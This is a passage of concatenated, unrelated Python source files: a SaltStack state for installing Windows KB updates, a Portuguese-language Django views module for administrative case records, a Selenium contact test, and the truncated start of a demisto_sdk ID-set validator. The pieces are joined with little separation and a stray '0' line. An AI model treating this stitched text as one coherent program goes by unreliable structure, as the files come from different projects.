Update .. versionadded:: 2018.3.4 """ import logging import salt.utils.platform import salt.utils.url from salt.exceptions import CommandExecutionError, SaltInvocationError log = logging.getLogger(__name__) # Define the module's virtual name __virtualname__ = "wusa" def __virtual__(): """ Load only on Windows """ if not salt.utils.platform.is_windows(): return False, "Only available on Windows systems" return __virtualname__ def installed(name, source): """ Ensure an update is installed on the minion Args: name(str): Name of the Windows KB ("KB123456") source (str): Source of .msu file corresponding to the KB Example: .. code-block:: yaml KB123456: wusa.installed: - source: salt://kb123456.msu """ ret = {"name": name, "changes": {}, "result": False, "comment": ""} # Input validation if not name: raise SaltInvocationError('Must specify a KB "name"') if not source: raise SaltInvocationError('Must specify a "source" file to install') # Is the KB already installed if __salt__["wusa.is_installed"](name): ret["result"] = True ret["comment"] = "{} already installed".format(name) return ret # Check for test=True if __opts__["test"] is True: ret["result"] = None ret["comment"] = "{} would be installed".format(name) ret["result"] = None return ret # Cache the file cached_source_path = __salt__["cp.cache_file"](path=source, saltenv=__env__) if not cached_source_path: msg = 'Unable to cache {} from saltenv "{}"'.format( salt.utils.url.redact_http_basic_auth(source), __env__ ) ret["comment"] = msg return ret # Install the KB additional_comment = "" try: __salt__["wusa.install"](cached_source_path) except CommandExecutionError as exc: additional_comment = exc.message # Verify successful install if __salt__["wusa.is_installed"](name): ret["comment"] = "{} was installed. {}".format(name, additional_comment) ret["changes"] = {"old": False, "new": True} ret["result"] = True else: ret["comment"] = "{} failed to install. 
{}".format(name, additional_comment) return ret def uninstalled(name): """ Ensure an update is uninstalled from the minion Args: name(str): Name of the Windows KB ("KB123456") Example: .. code-block:: yaml KB123456: wusa.uninstalled """ ret = {"name": name, "changes": {}, "result": False, "comment": ""} # Is the KB already uninstalled if not __salt__["wusa.is_installed"](name): ret["result"] = True ret["comment"] = "{} already uninstalled".format(name) return ret # Check for test=True if __opts__["test"] is True: ret["result"] = None ret["comment"] = "{} would be uninstalled".format(name) ret["result"] = None return ret # Uninstall the KB __salt__["wusa.uninstall"](name) # Verify successful uninstall if not __salt__["wusa.is_installed"](name): ret["comment"] = "{} was uninstalled".format(name) ret["changes"] = {"old": True, "new": False} ret["result"] = True else: ret["comment"] = "{} failed to uninstall".format(name) return ret # -*- coding: utf-8 -*- from core.permissions import ( GRUPO_ADMINISTRATIVO, GRUPO_SUPERIOR_ADMINISTRATIVO, PERMISSOES_ADMINISTRATIVO, PermissionView, SelectUserOrgaoExternoView, SelectUserPermissionView, padrao_check_permissions, verifica_direcao ) from core.validators import ALLOWED_EXTENSIONS, MAX_FILE_SIZE from core.views import ( DespachoMixin, GravacaoMidiaMixin, OfExternoMixin, OfInternoMixin, OrgaoPermissionRequiredMixin, ProcessosAjaxDatatableView, ProcessosListView, VincularProcessosCreateMixin ) from django.contrib import messages from django.contrib.auth.mixins import LoginRequiredMixin from django.contrib.messages.views import SuccessMessageMixin from django.core.exceptions import PermissionDenied from django.db import transaction from django.http import HttpResponseRedirect from django.shortcuts import get_object_or_404, redirect from django.urls import reverse, reverse_lazy from django.utils import timezone from django.views.generic import CreateView, DetailView, UpdateView from easy_pdf.views import PDFTemplateResponseMixin from guardian.mixins import PermissionRequiredMixin from .forms import ( AdministrativoForm, AdministrativoUpdateForm, ControlEmpresasForm, DespachoAdmForm, DocumentoAdmForm, MidiaAdmForm, OfEmpresasFormset, OfEmpresasUpdateForm, OficioExternoAdmForm, OficioInternoAdmForm, OfInternoAdmUpdateForm, StatusAdmForm ) from .models import ( Administrativo, AtoAdm, ControlEmpresas, DespachoAdm, DocumentosGeraisAdm, MidiaAdm, OfEmpresas, OficioExternoAdm, OficioInternoAdm, StatusAdm ) class AdministrativoCreateView(LoginRequiredMixin, OrgaoPermissionRequiredMixin, SuccessMessageMixin, CreateView): model = Administrativo form_class = AdministrativoForm orgao_permission_required = 'account.access_ADMINISTRATIVO' view_permission_required = 'adm.add_administrativo' template_name = 'componentes/shares/FormsCriarProcedimento.html' success_message = "Procedimento criado com sucesso" def get(self, request, *args, **kwargs): user_has_perm = self.request.user.has_perm(self.view_permission_required) user_has_authority = verifica_direcao(request, GRUPO_SUPERIOR_ADMINISTRATIVO) if user_has_perm or user_has_authority: return super(AdministrativoCreateView, self).get(request, *args, **kwargs) else: raise PermissionDenied def get_context_data(self, **kwargs): context = super(AdministrativoCreateView, self).get_context_data(**kwargs) context['title_header'] = 'Cadastrar Processo' context['form_adm'] = True return context def form_valid(self, form): user = self.request.user form.instance.autor = user form.instance.orgao_processo = user.profile.orgao_link 
form.instance.gerar_numero_processo() return super(AdministrativoCreateView, self).form_valid(form) def get_success_url(self): return reverse_lazy('adm:detalhe_processo_adm', kwargs={'pk': self.object.pk}) criar_processo_adm = AdministrativoCreateView.as_view() class AdministrativoUpdateView(LoginRequiredMixin, OrgaoPermissionRequiredMixin, SuccessMessageMixin, UpdateView): model = Administrativo form_class = AdministrativoUpdateForm orgao_permission_required = 'account.access_ADMINISTRATIVO' view_permission_required = 'adm.change_administrativo' template_name = 'componentes/shares/FormsCriarProcedimento.html' success_message = "Procedimento atualizado com sucesso" def get(self, request, *args, **kwargs): obj = get_object_or_404(Administrativo, pk=self.kwargs['pk']) user_has_perm = self.request.user.has_perm(self.view_permission_required, obj) user_has_authority = verifica_direcao(request, GRUPO_SUPERIOR_ADMINISTRATIVO) if user_has_perm or user_has_authority: return super(AdministrativoUpdateView, self).get(request, *args, **kwargs) else: raise PermissionDenied def get_context_data(self, **kwargs): context = super(AdministrativoUpdateView, self).get_context_data(**kwargs) context['title_header'] = 'Editar Processo' context['form_adm'] = True return context def form_valid(self, form): arquivar = form.cleaned_data.get('arquivar') with transaction.atomic(): if arquivar is True: form.instance.arquivador = self.request.user form.instance.data_arquivamento = timezone.now() form.instance.modificador = self.request.user return super(AdministrativoUpdateView, self).form_valid(form) def get_success_url(self): return reverse_lazy('adm:detalhe_processo_adm', kwargs={'pk': self.object.pk}) editar_processo_adm = AdministrativoUpdateView.as_view() class AdministrativoListView(ProcessosListView): orgao_permission_required = 'account.access_ADMINISTRATIVO' view_permission_required = 'adm.view_administrativo' url_cadastrar = reverse_lazy('adm:criar_processo_adm') url_processos_ajax = reverse_lazy('adm:processos_adm_ajax') listar_adm = AdministrativoListView.as_view() class AdministrativoAjaxDatatableView(ProcessosAjaxDatatableView): model = Administrativo title = 'Administrativo' initial_order = [["criacao", "desc"], ] search_values_separator = '+' show_column_filters = False length_menu = [[25, 50, 100, 300], [25, 50, 100, 300]] processo_permission_required = ['adm.view_administrativo', 'adm.add_administrativo', 'adm.change_administrativo'] orgao_permission_required = 'account.access_ADMINISTRATIVO' disable_queryset_optimization = True column_defs = [ ProcessosAjaxDatatableView.render_row_tools_column_def(), {'name': 'id', 'visible': False, 'searchable': False, 'orderable': False}, {'name': 'observacao', 'visible': False, 'searchable': True}, {'name': 'criacao', 'title': 'Criação'}, {'name': 'numero_processo', 'title': 'Processo'}, {'name': 'oficiante', }, {'name': 'destino_adm', 'max_length': 40}, { 'name': 'assunto_adm', 'title': 'Assunto', 'foreign_field': 'assunto_adm__assunto', 'max_length': 40 }, {'name': 'outro', 'visible': False, 'searchable': True}, {'name': 'sigla', 'title': 'Criado por', 'foreign_field': 'orgao_processo__sigla'}, { 'name': 'acessar', 'title': (''), 'searchable': False, 'orderable': False, 'className': 'text-center' }, ] def customize_row(self, row, obj): processo_externo = ' processo-externo' if obj.orgao_processo != self.request.user.profile.orgao_link else '' arquivado = ' arquivado' if obj.arquivar else '' row['acessar'] = f""" Ver Processo """ row['assunto_adm'] = 
obj.get_assunto() def render_row_details(self, pk, request=None): obj = self.model.objects.get(pk=pk) return f"""

    Observação: {obj.observacao}

    """ processos_adm_ajax = AdministrativoAjaxDatatableView.as_view() class AdministrativoDetailView(PermissionRequiredMixin, OrgaoPermissionRequiredMixin, DetailView): model = Administrativo context_object_name = 'processo_adm' template_name = 'componentes/singles/processos/adm/detalhes/_DetalheGeral.html' permission_required = 'adm.view_administrativo' orgao_permission_required = 'account.access_ADMINISTRATIVO' raise_exception = True grupo_superior = GRUPO_SUPERIOR_ADMINISTRATIVO def get_context_data(self, **kwargs): context = super(AdministrativoDetailView, self).get_context_data(**kwargs) context['atos'] = self.object.get_all_atos() context['is_coordenador'] = verifica_direcao(self.request, GRUPO_SUPERIOR_ADMINISTRATIVO) context['anulacao_baseurl'] = reverse('adm:anular_ato', kwargs={'pk': '0'}) return context def check_permissions(self, request): padrao_check_permissions(self, request) detalhe_processo_adm = AdministrativoDetailView.as_view() class AdmExtratoPdfView(PDFTemplateResponseMixin, LoginRequiredMixin, OrgaoPermissionRequiredMixin, DetailView): model = Administrativo template_name = 'componentes/singles/processos/adm/ExtratoPdf.html' context_object_name = 'processo_adm' orgao_permission_required = 'account.access_ADMINISTRATIVO' view_permission_required = 'adm.view_administrativo' def get_context_data(self, **kwargs): context = super(AdmExtratoPdfView, self).get_context_data(**kwargs) context['atos'] = self.object.get_all_atos() return context extrato_pdf_adm = AdmExtratoPdfView.as_view() class AtoAdmCreateView(LoginRequiredMixin, OrgaoPermissionRequiredMixin, CreateView): orgao_permission_required = 'account.access_ADMINISTRATIVO' view_permission_required = 'adm.add_administrativo' ato_create_view = True processo_model = Administrativo def get(self, request, *args, **kwargs): obj = get_object_or_404(Administrativo, pk=self.kwargs['pk']) user_has_perm = self.request.user.has_perm(self.view_permission_required, obj) user_has_authority = verifica_direcao(request, GRUPO_SUPERIOR_ADMINISTRATIVO) if user_has_perm or user_has_authority: if obj.arquivar is False: return super(AtoAdmCreateView, self).get(request, *args, **kwargs) else: return redirect('core:arquivado') else: raise PermissionDenied def set_instance_form(self, form): form.instance.autor = self.request.user form.instance.processo = Administrativo.objects.get(pk=self.kwargs['pk']) form.instance.tipo_ato = self.kwargs['tipo_ato'] def get_success_url(self): return reverse_lazy('notifier:ato_adm', kwargs={'model_pk': self.object.pk}) class AtoAdmUpdateView(OrgaoPermissionRequiredMixin, UpdateView): orgao_permission_required = 'account.access_ADMINISTRATIVO' view_permission_required = 'adm.change_administrativo' ato_update_view = True def get(self, request, *args, **kwargs): obj = get_object_or_404(self.model, pk=self.kwargs['pk']) user_has_perm = self.request.user.has_perm(self.view_permission_required, obj.processo) user_has_authority = verifica_direcao(request, GRUPO_SUPERIOR_ADMINISTRATIVO) if user_has_perm or user_has_authority: if obj.processo.arquivar is False: return super(AtoAdmUpdateView, self).get(request, *args, **kwargs) else: return redirect('core:arquivado') else: raise PermissionDenied class OfInternoCreateView(OfInternoMixin, AtoAdmCreateView): model = OficioInternoAdm form_class = OficioInternoAdmForm processo_class = Administrativo outros_disabled = True subtitle = 'Expedir Ofício' processos_css = False def form_valid(self, form): self.set_instance_form(form) return super(OfInternoCreateView, 
self).form_valid(form) add_ofinterno_adm = OfInternoCreateView.as_view() class OfInternoUpdateView(LoginRequiredMixin, OfInternoMixin, AtoAdmUpdateView): model = OficioInternoAdm form_class = OfInternoAdmUpdateForm processo_class = Administrativo of_interno_update = True outros_disabled = False subtitle = 'Modificar Ofício Expedido' processos_css = True def form_valid(self, form): data = {x: valor for x, valor in form.cleaned_data.items() if valor is not None and valor is not False and valor != ''} data['modificador'] = self.request.user data['autoridade'] = str(data['autoridade']) OficioInternoAdm.objects.filter(pk=self.kwargs['pk']).update(**data) return HttpResponseRedirect(self.get_success_url()) def get_success_url(self): return reverse_lazy('notifier:ato_adm', kwargs={'model_pk': self.object.pk}) editar_ofinterno_adm = OfInternoUpdateView.as_view() class OfInternoArquivoUpdateView(LoginRequiredMixin, AtoAdmUpdateView): model = OficioInternoAdm fields = ['arquivo'] template_name = 'componentes/shares/DadosPopup.html' def get_context_data(self, **kwargs): context = super(OfInternoArquivoUpdateView, self).get_context_data(**kwargs) context['max_size'] = MAX_FILE_SIZE context['allowed_extensions'] = ALLOWED_EXTENSIONS return context def form_valid(self, form): form.instance.modificador = self.request.user self.object = form.save() return super(OfInternoArquivoUpdateView, self).form_valid(form) def get_success_url(self): return reverse_lazy('notifier:ato_adm', kwargs={'model_pk': self.object.pk}) editar_ofinterno_arq_adm = OfInternoArquivoUpdateView.as_view() class OfInternoAdmConfirmView(LoginRequiredMixin, AtoAdmUpdateView): model = OficioInternoAdm fields = ['confirmacao', 'nome_confirm'] template_name = 'componentes/shares/ConfirmacaoPopup.html' def form_valid(self, form): form.instance.modificador = self.request.user return super(OfInternoAdmConfirmView, self).form_valid(form) def get_success_url(self): return reverse_lazy('notifier:ato_adm', kwargs={'model_pk': self.object.pk}) editar_confirmacao_adm = OfInternoAdmConfirmView.as_view() class OfInternoAdmDataEnvioView(LoginRequiredMixin, AtoAdmUpdateView): model = OficioInternoAdm fields = ['data_envio'] template_name = 'componentes/shares/DataEnvioPopup.html' def form_valid(self, form): form.instance.modificador = self.request.user self.object = form.save() return super(OfInternoAdmDataEnvioView, self).form_valid(form) def get_success_url(self): return reverse_lazy('notifier:ato_adm', kwargs={'model_pk': self.object.pk}) editar_dataenvio_adm = OfInternoAdmDataEnvioView.as_view() class OfExternoAdmCreateView(OfExternoMixin, AtoAdmCreateView): model = OficioExternoAdm form_class = OficioExternoAdmForm subtitle = "Adicionar Ofício Recebido" def form_valid(self, form): self.set_instance_form(form) return super(OfExternoAdmCreateView, self).form_valid(form) add_ofexterno_adm = OfExternoAdmCreateView.as_view() class OfExternoAdmUpdateView(LoginRequiredMixin, OfExternoMixin, AtoAdmUpdateView): model = OficioExternoAdm form_class = OficioExternoAdmForm subtitle = "Modificar Ofício Recebido" def form_valid(self, form): data = {x: valor for x, valor in form.cleaned_data.items() if valor is not None and valor is not False and valor != ''} data['modificador'] = self.request.user OficioExternoAdm.objects.filter(pk=self.kwargs['pk']).update(**data) return HttpResponseRedirect(self.get_success_url()) def get_success_url(self): return reverse_lazy('notifier:ato_adm', kwargs={'model_pk': self.object.pk}) editar_ofexterno_adm = 
OfExternoAdmUpdateView.as_view() class DespachoAdmCreateView(DespachoMixin, AtoAdmCreateView): model = DespachoAdm form_class = DespachoAdmForm path_to_include = 'componentes/shares/CKDespachoGeral.html' subtitle = 'Cadastrar Despacho' def get(self, request, *args, **kwargs): obj = get_object_or_404(Administrativo, pk=self.kwargs['pk']) if verifica_direcao(request, GRUPO_SUPERIOR_ADMINISTRATIVO): if obj.arquivar is False: return super(DespachoAdmCreateView, self).get(request, *args, **kwargs) else: return redirect('core:arquivado') else: raise PermissionDenied def form_valid(self, form): self.set_instance_form(form) return super(DespachoAdmCreateView, self).form_valid(form) add_despacho_adm = DespachoAdmCreateView.as_view() class DespachoAdmUpdateView(LoginRequiredMixin, DespachoMixin, AtoAdmUpdateView): model = DespachoAdm form_class = DespachoAdmForm path_to_include = 'componentes/shares/CKDespachoEditar.html' subtitle = 'Editar Despacho' def get_queryset(self): queryset = super(DespachoAdmUpdateView, self).get_queryset() queryset = queryset.filter(autor=self.request.user) return queryset def get_success_url(self): return reverse_lazy('notifier:ato_adm', kwargs={'model_pk': self.object.pk}) def form_valid(self, form): form.instance.modificador = self.request.user return super(DespachoAdmUpdateView, self).form_valid(form) editar_despacho_adm = DespachoAdmUpdateView.as_view() class StatusAdmCreateView(AtoAdmCreateView): model = StatusAdm form_class = StatusAdmForm template_name = 'componentes/shares/FormGeral.html' def get_context_data(self, **kwargs): context = super(StatusAdmCreateView, self).get_context_data(**kwargs) context['subtitle'] = 'Inserir Status' context['outros_disabled'] = True return context def form_valid(self, form): self.set_instance_form(form) return super(StatusAdmCreateView, self).form_valid(form) add_status_adm = StatusAdmCreateView.as_view() class StatusAdmUpdateView(LoginRequiredMixin, AtoAdmUpdateView): model = StatusAdm form_class = StatusAdmForm template_name = 'componentes/shares/FormGeral.html' def get_context_data(self, **kwargs): context = super(StatusAdmUpdateView, self).get_context_data(**kwargs) context['subtitle'] = 'Inserir Status' context['outros_disabled'] = True return context def form_valid(self, form): form.instance.modificador = self.request.user return super(StatusAdmUpdateView, self).form_valid(form) def get_success_url(self): return reverse_lazy('notifier:ato_adm', kwargs={'model_pk': self.object.pk}) editar_status_adm = StatusAdmUpdateView.as_view() class GravacaoAdmCreateView(GravacaoMidiaMixin, AtoAdmCreateView): model = MidiaAdm form_class = MidiaAdmForm def form_valid(self, form): self.set_instance_form(form) return super(GravacaoAdmCreateView, self).form_valid(form) add_gravacao_adm = GravacaoAdmCreateView.as_view() class DocumentoCreateView(AtoAdmCreateView): model = DocumentosGeraisAdm form_class = DocumentoAdmForm template_name = 'componentes/shares/FormGeral.html' def get_context_data(self, **kwargs): context = super(DocumentoCreateView, self).get_context_data(**kwargs) context['subtitle'] = 'Adicionar Documento' context['outros_disabled'] = True return context def form_valid(self, form): self.set_instance_form(form) return super(DocumentoCreateView, self).form_valid(form) add_documento_adm = DocumentoCreateView.as_view() class DocumentoUpdateView(LoginRequiredMixin, AtoAdmUpdateView): model = DocumentosGeraisAdm form_class = DocumentoAdmForm template_name = 'componentes/shares/FormGeral.html' def get_context_data(self, **kwargs): 
context = super(DocumentoUpdateView, self).get_context_data(**kwargs) context['subtitle'] = 'Atualizar Documento-SSP/PI' return context def get_queryset(self): queryset = super(DocumentoUpdateView, self).get_queryset() queryset = queryset.filter(autor=self.request.user) return queryset def form_valid(self, form): data = {x: valor for x, valor in form.cleaned_data.items() if valor is not None and valor is not False and valor != ''} data['modificador'] = self.request.user self.model.objects.filter(pk=self.kwargs['pk']).update(**data) return HttpResponseRedirect(self.get_success_url()) def get_success_url(self): return reverse_lazy('notifier:ato_adm', kwargs={'model_pk': self.object.pk}) editar_documento_adm = DocumentoUpdateView.as_view() class SelectUserPermissionAdmView(LoginRequiredMixin, OrgaoPermissionRequiredMixin, SelectUserPermissionView): permissoes = PERMISSOES_ADMINISTRATIVO model = Administrativo name_grupo = GRUPO_ADMINISTRATIVO grupo_superior = GRUPO_SUPERIOR_ADMINISTRATIVO orgao_permission_required = 'account.access_ADMINISTRATIVO' view_permission_required = 'adm.view_administrativo' modulo = 'Administrativo' usuarios_externos = False def get_objeto(self): return get_object_or_404(self.model, pk=self.kwargs['pk']) def get_success_url(self): return reverse_lazy('adm:select_perm_adm', kwargs={'pk': self.kwargs['pk']}) select_user_adm = SelectUserPermissionAdmView.as_view() class SelectUserOrgaoExternoAdmView(LoginRequiredMixin, OrgaoPermissionRequiredMixin, SelectUserOrgaoExternoView): permissoes = PERMISSOES_ADMINISTRATIVO model = Administrativo name_grupo = GRUPO_ADMINISTRATIVO grupo_superior = GRUPO_SUPERIOR_ADMINISTRATIVO orgao_permission_required = 'account.access_ADMINISTRATIVO' view_permission_required = 'adm.view_administrativo' modulo = 'Administrativo' usuarios_externos = True def get_objeto(self): return get_object_or_404(self.model, pk=self.kwargs['pk']) def get_success_url(self): return reverse_lazy('adm:select_perm_adm', kwargs={'pk': self.kwargs['pk']}) add_external_users_adm = SelectUserOrgaoExternoAdmView.as_view() class PermissionAdmView(LoginRequiredMixin, OrgaoPermissionRequiredMixin, PermissionView): model = Administrativo permissoes = PERMISSOES_ADMINISTRATIVO grupo_superior = GRUPO_SUPERIOR_ADMINISTRATIVO orgao_permission_required = 'account.access_ADMINISTRATIVO' view_permission_required = 'adm.view_administrativo' def get_objeto(self): return get_object_or_404(self.model, pk=self.kwargs['pk']) def get_success_url(self): return reverse_lazy('adm:detalhe_processo_adm', kwargs={'pk': self.kwargs['pk']}) select_perm_adm = PermissionAdmView.as_view() class AnularAtoView(LoginRequiredMixin, OrgaoPermissionRequiredMixin, UpdateView): model = AtoAdm fields = ['motivo_anulacao'] pk_url_kwarg = 'pk' orgao_permission_required = 'account.access_ADMINISTRATIVO' view_permission_required = 'adm.view_administrativo' def get_object_processo(self): ato = get_object_or_404(self.model, pk=self.kwargs['pk']) return ato.processo def dispatch(self, request, *args, **kwargs): objeto = get_object_or_404(self.model, pk=self.kwargs['pk']) if verifica_direcao(request, GRUPO_SUPERIOR_ADMINISTRATIVO): if objeto.processo.arquivar is False: return super().dispatch(request, *args, **kwargs) else: return redirect('core:arquivado') else: raise PermissionDenied def form_valid(self, form): if form.cleaned_data['motivo_anulacao'] == '': messages.warning(self.request, 'Informe um motivo ao anular um ato') return redirect(self.get_success_url()) self.object.anulado = True 
self.object.modificador = self.request.user return super().form_valid(form) def get_success_url(self): return reverse_lazy('adm:detalhe_processo_adm', kwargs={'pk': self.object.processo.pk}) anular_ato = AnularAtoView.as_view() class VincularProcessosCreateView(VincularProcessosCreateMixin): model_dispatch = Administrativo group_dispatch = GRUPO_SUPERIOR_ADMINISTRATIVO orgao_permission_required = 'account.access_ADMINISTRATIVO' view_permission_required = 'adm.view_administrativo' def get_success_url(self): obj = get_object_or_404(Administrativo, pk=self.kwargs['pk']) return reverse_lazy('adm:detalhe_processo_adm', kwargs={'pk': obj.pk}) vincular_processos = VincularProcessosCreateView.as_view() class ControlEmpresasCreateView(AtoAdmCreateView): model = ControlEmpresas form_class = ControlEmpresasForm template_name = 'componentes/shares/OficioEmpresas.html' def get_context_data(self, **kwargs): data = super(ControlEmpresasCreateView, self).get_context_data(**kwargs) if self.request.POST: data['oficios'] = OfEmpresasFormset(self.request.POST, form_kwargs=self.get_formset_kwargs()) else: data['oficios'] = OfEmpresasFormset(form_kwargs=self.get_formset_kwargs()) data['oficios_inter'] = True return data def form_valid(self, form): context = self.get_context_data() oficios = context['oficios'] with transaction.atomic(): self.set_instance_form(form) self.object = form.save() if oficios.is_valid(): oficios.instance = self.object oficios.save() return super(ControlEmpresasCreateView, self).form_valid(form) def get_formset_kwargs(self): processo = get_object_or_404(Administrativo, pk=self.kwargs['pk']) return {'orgao_pk': processo.orgao_processo.pk} add_ofempresas = ControlEmpresasCreateView.as_view() class OfEmpresaUpdateViewMixin(OrgaoPermissionRequiredMixin, UpdateView): orgao_permission_required = 'account.access_ADMINISTRATIVO' view_permission_required = 'adm.change_administrativo' ato_update_view = True def get(self, request, *args, **kwargs): obj = get_object_or_404(self.model, pk=self.kwargs['pk']) user_has_perm = self.request.user.has_perm(self.view_permission_required, obj.controlempresas.processo) user_has_authority = verifica_direcao(request, GRUPO_SUPERIOR_ADMINISTRATIVO) if user_has_perm or user_has_authority: if obj.controlempresas.processo.arquivar is False: return super(OfEmpresaUpdateViewMixin, self).get(request, *args, **kwargs) else: return redirect('core:arquivado') else: raise PermissionDenied def get_success_url(self): return reverse_lazy('adm:detalhe_processo_adm', kwargs={'pk': self.object.controlempresas.processo.pk}) class OfEmpresasArquivoUpdateView(LoginRequiredMixin, OfEmpresaUpdateViewMixin): model = OfEmpresas fields = ['arquivo'] template_name = 'componentes/shares/DadosPopup.html' def get_context_data(self, **kwargs): context = super(OfEmpresasArquivoUpdateView, self).get_context_data(**kwargs) context['max_size'] = MAX_FILE_SIZE context['allowed_extensions'] = ALLOWED_EXTENSIONS return context def form_valid(self, form): form.instance.modificador = self.request.user return super(OfEmpresasArquivoUpdateView, self).form_valid(form) ofempresas_upload_arquivo = OfEmpresasArquivoUpdateView.as_view() class OfEmpresaConfirmUpdateView(LoginRequiredMixin, OfEmpresaUpdateViewMixin): model = OfEmpresas fields = ['confirmacao', 'nome_confirm'] template_name = 'componentes/shares/ConfirmacaoPopup.html' def form_valid(self, form): form.instance.modificador = self.request.user return super(OfEmpresaConfirmUpdateView, self).form_valid(form) ofempresas_confirmar = 
OfEmpresaConfirmUpdateView.as_view()


class OfEmpresasUpdateView(LoginRequiredMixin, OfEmpresaUpdateViewMixin):
    model = OfEmpresas
    form_class = OfEmpresasUpdateForm
    template_name = 'componentes/shares/FormGeral.html'

    def get_context_data(self, **kwargs):
        data = super(OfEmpresasUpdateView, self).get_context_data(**kwargs)
        data['processos_css'] = True
        data['subtitle'] = 'Atualizar Ofício'
        return data

    def form_valid(self, form):
        form.instance.modificador = self.request.user
        return super(OfEmpresasUpdateView, self).form_valid(form)


ofempresas_editar = OfEmpresasUpdateView.as_view()
0
# -*- coding: utf-8 -*-
from selenium import webdriver
import string
import pytest
import random
from model.contact import Contact


def test_add_contact(app, json_contact):
    contact = json_contact
    old_contact = app.contact.get_contact_list()
    app.contact.create_new_contact(contact)
    assert len(old_contact)+1 == app.contact.count()
    new_contact = app.contact.get_contact_list()
    old_contact.append(contact)
    assert sorted(old_contact, key=Contact.id_or_max) == sorted(new_contact, key=Contact.id_or_max)
demisto_sdk/commands/common/hook_validations/id.py
import os
import re
from collections import OrderedDict
from distutils.version import LooseVersion

import click

import demisto_sdk.commands.common.constants as constants
from demisto_sdk.commands.common.configuration import Configuration
from demisto_sdk.commands.common.constants import GENERIC_COMMANDS_NAMES
from demisto_sdk.commands.common.errors import Errors
from demisto_sdk.commands.common.hook_validations.base_validator import \
    BaseValidator
from demisto_sdk.commands.common.update_id_set import (get_classifier_data,
                                                       get_incident_type_data,
                                                       get_integration_data,
                                                       get_mapper_data,
                                                       get_pack_metadata_data,
                                                       get_playbook_data,
                                                       get_script_data)
from demisto_sdk.commands.unify.yml_unifier import YmlUnifier


class IDSetValidations(BaseValidator):
    """IDSetValidations was designed to make sure all the inter-connected content entities are valid.

    The id_set.json file is created using the update_id_set.py script. It contains all the data from the various
    executables we have in the Content repository - Playbooks/Scripts/Integrations. The script extracts the command
    and script names so that later on we will be able to use them in the test filtering we have in our build system.

    Attributes:
        is_circle (bool): whether we are running on circle or local env.
        id_set (dict): Dictionary that holds all the data from the id_set.json file.
        script_set (set): Set of all the data regarding scripts in our system.
        playbook_set (set): Set of all the data regarding playbooks in our system.
        integration_set (set): Set of all the data regarding integrations in our system.
        test_playbook_set (set): Set of all the data regarding test playbooks in our system.
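
    Illustrative sketch (not taken from a real repo; field names are inferred from how the sections are read
    further down in this class) of the id_set.json shape this validator works against:

        {
            "scripts": [{"MyScript": {"name": "MyScript", "fromversion": "5.0.0", "depends_on": ["some-command"]}}],
            "playbooks": [{"MyPlaybook": {"name": "MyPlaybook", "file_path": "Packs/.../MyPlaybook.yml",
                                          "fromversion": "5.0.0", "implementing_scripts": [],
                                          "implementing_playbooks": [], "command_to_integration": {}}}],
            "integrations": [], "TestPlaybooks": [], "Classifiers": [], "Layouts": [], "Mappers": [],
            "IncidentTypes": [], "Packs": {"MyPackFolder": {"name": "My Pack"}}
        }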
""" SCRIPTS_SECTION = "scripts" PLAYBOOK_SECTION = "playbooks" INTEGRATION_SECTION = "integrations" TEST_PLAYBOOK_SECTION = "TestPlaybooks" CLASSIFIERS_SECTION = "Classifiers" LAYOUTS_SECTION = "Layouts" MAPPERS_SECTION = "Mappers" INCIDENT_TYPES_SECTION = "IncidentTypes" PACKS_SECTION = "Packs" def __init__(self, is_test_run=False, is_circle=False, configuration=Configuration(), ignored_errors=None, print_as_warnings=False, suppress_print=False, id_set_file=None, json_file_path=None): super().__init__(ignored_errors=ignored_errors, print_as_warnings=print_as_warnings, suppress_print=suppress_print, json_file_path=json_file_path) self.is_circle = is_circle self.configuration = configuration if not is_test_run and self.is_circle: self.id_set_file = id_set_file self.script_set = self.id_set_file[self.SCRIPTS_SECTION] self.playbook_set = self.id_set_file[self.PLAYBOOK_SECTION] self.integration_set = self.id_set_file[self.INTEGRATION_SECTION] self.test_playbook_set = self.id_set_file[self.TEST_PLAYBOOK_SECTION] self.classifiers_set = self.id_set_file[self.CLASSIFIERS_SECTION] self.layouts_set = self.id_set_file[self.LAYOUTS_SECTION] self.mappers_set = self.id_set_file[self.MAPPERS_SECTION] self.incident_types_set = self.id_set_file[self.INCIDENT_TYPES_SECTION] self.packs_set = self.id_set_file[self.PACKS_SECTION] def _is_incident_type_default_playbook_found(self, incident_type_data): """Check if the default playbook of an incident type is in the id_set Args: incident_type_data (dict): Dictionary that holds the extracted details from the given incident type. Returns: bool. Whether the playbook is in the id_set or not. """ is_valid = True incident_type_name = list(incident_type_data.keys())[0] incident_type_playbook = incident_type_data[incident_type_name].get('playbooks') if incident_type_playbook: # setting initially to false, if the default playbook is in the id_set, it will be valid is_valid = False for checked_playbook in self.playbook_set: checked_playbook_name = list(checked_playbook.keys())[0] if incident_type_playbook == checked_playbook_name: is_valid = True break if not is_valid: # add error message if not valid error_message, error_code = Errors.incident_type_non_existent_playbook_id(incident_type_name, incident_type_playbook) if not self.handle_error(error_message, error_code, file_path="id_set.json"): is_valid = True return is_valid def _is_non_real_command_found(self, script_data): """Check if the script depend-on section has a non real command Args: script_data (dict): Dictionary that holds the extracted details from the given script. Returns: bool. Whether the script is valid or not. """ is_valid = True depends_on_commands = script_data.get('depends_on') if depends_on_commands: for command in depends_on_commands: if command != 'test-module': if command.endswith('dev') or command.endswith('copy'): error_message, error_code = Errors.invalid_command_name_in_script(script_data.get('name'), command) if self.handle_error(error_message, error_code, file_path="id_set.json"): return not is_valid return is_valid def _is_integration_classifier_and_mapper_found(self, integration_data): """Check if the integration classifier and mapper are found Args: integration_data (dict): Dictionary that holds the extracted details from the given integration. Returns: bool. Whether the integration fetch incident classifier is found. 
""" is_valid_classifier = True integration_classifier = integration_data.get('classifiers', '') # there is only 1 classifier per integration if integration_classifier: # setting initially to false, if the classifier is in the id_set, it will be valid is_valid_classifier = False for classifier in self.classifiers_set: checked_classifier_name = list(classifier.keys())[0] if integration_classifier == checked_classifier_name: is_valid_classifier = True break if not is_valid_classifier: # add error message if not valid error_message, error_code = Errors.integration_non_existent_classifier(integration_classifier) if not self.handle_error(error_message, error_code, file_path="id_set.json"): is_valid_classifier = True is_valid_mapper = True integration_mapper = integration_data.get('mappers', [''])[0] # there is only 1 mapper per integration if integration_mapper: # setting initially to false, if the mapper is in the id_set, it will be valid is_valid_mapper = False for mapper in self.mappers_set: checked_mapper_name = list(mapper.keys())[0] if integration_mapper == checked_mapper_name: is_valid_mapper = True break if not is_valid_mapper: # add error message if not valid error_message, error_code = Errors.integration_non_existent_mapper(integration_mapper) if not self.handle_error(error_message, error_code, file_path="id_set.json"): is_valid_mapper = True return 